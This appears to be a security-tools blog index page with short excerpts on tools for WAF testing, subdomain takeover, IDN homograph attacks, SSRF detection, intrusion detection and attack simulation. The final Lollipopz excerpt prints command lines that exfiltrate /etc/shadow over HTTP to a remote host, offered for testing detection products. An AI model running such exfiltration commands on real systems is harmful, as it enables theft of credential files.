Gotestwaf – Go Test WAF Is A Tool To Test Your WAF Detection Capabilities Against Different Types Of Attacks And By-Pass Techniques

An open-source Go project to test different web application firewalls (WAF) for detection logic and bypasses. How it works It is a 3-steps requests generation process that multiply amount of payloads to encoders and placeholders. Let’s say you defined 2 payloads, 3 encoders (Base64, JSON, and URLencode) and 1 placeholder (HTTP GET variable). In thisRead More

NtHiM – Super Fast Sub-domain Takeover Detection

NtHiM – Super Fast Sub-domain Takeover Detection Installation Method 1: Using Pre-compiled Binaries The pre-compiled binaries for different systems are available in the Releases page. You can download the one suitable for your system, unzip the file and start using NtHiM. Method 2: Using NtHiM is available on So, if you have RustRead More

Ditto – A Tool For IDN Homograph Attacks And Detection

Ditto is a small tool that accepts a domain name as input and generates all its variants for an homograph attack as output, checking which ones are available and which are already registered. PoC domains https://tᴡ https://clᴏ Using with Docker The image on docker hub is updated on every push, you can just: docker runRead More

SSRF-King – SSRF Plugin For Burp Automates SSRF Detection In All Of The Request

SSRF plugin for burp that Automates SSRF Detection in all of the Request Upcoming Features Checklist It will soon have a user Interface to specifiy your own call back payload It will soon be able to test Json & XML Test for SMTP SSRF How to Install/Build git clone gradle build Now the fileRead More

ByteDance-HIDS – A Cloud-Native Host-Based Intrusion Detection Solution Project To Provide Next-Generation Threat Detection And Behavior Audition With Modern Architecture

ByteDance-HIDS is a Cloud-Native Host-Based Intrusion Detection solution project to provide next-generation Threat Detection and Behavior Audition with modern architecture. ByteDance-HIDS comprises three major components: ByteDance-HIDS Agent, co-worked with ByteDance-HIDS Driver, is the game-changer for the Data Collection market. It works at both Kernel and User Space of Linux System, providing rich data flow withRead More

Packer-Fuzzer – A Fast And Efficient Scanner For Security Detection Of Websites Constructed By Javascript Module Bundler Such As Webpack

With the popularity of web front-end packaging tools, have you encountered more and more websites represented by Webpack packager in daily penetration testing and security services? This type of packager will package the API and API parameters of the entire site together for centralized Web call, which is also convenient for us to quickly discoverRead More

Webscan – Browser-based Network Scanner And local-IP Detection

webscan is a browser-based network IP scanner and local IP detector. It detects IPs bound to the user/victim by listening on an RTP data channel via WebRTC and looping back to the port across any live IPs, as well as discovering all live IP addresses on valid subnets by monitoring for immediate timeouts (TCP RSTRead More

Teler – Real-time HTTP Intrusion Detection

teler is an real-time intrusion detection and threat alert based on web log that runs in a terminal with resources that we collect and provide by the community. Features Real-time: Analyze logs and identify suspicious activity in real-time. Alerting: teler provides alerting when a threat is detected, push notifications include Slack, Telegram and Discord. Monitoring:Read More

Leonidas – Automated Attack Simulation In The Cloud, Complete With Detection Use Cases

Leonidas is a framework for executing attacker actions in the cloud. It provides a YAML-based format for defining cloud attacker tactics, techniques and procedures (TTPs) and their associated detection properties. These definitions can then be compiled into: A web API exposing each test case as an individual endpoint Sigma rules ( for detection Documentation –Read More

Lollipopz – Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./ -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./ -m lollipopz.methods.http.param_cipher.GETClient -rh -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTP POST requests Server # ./ -m lollipopz.methods.http.param_cipher.POSTServer -lp 80Read More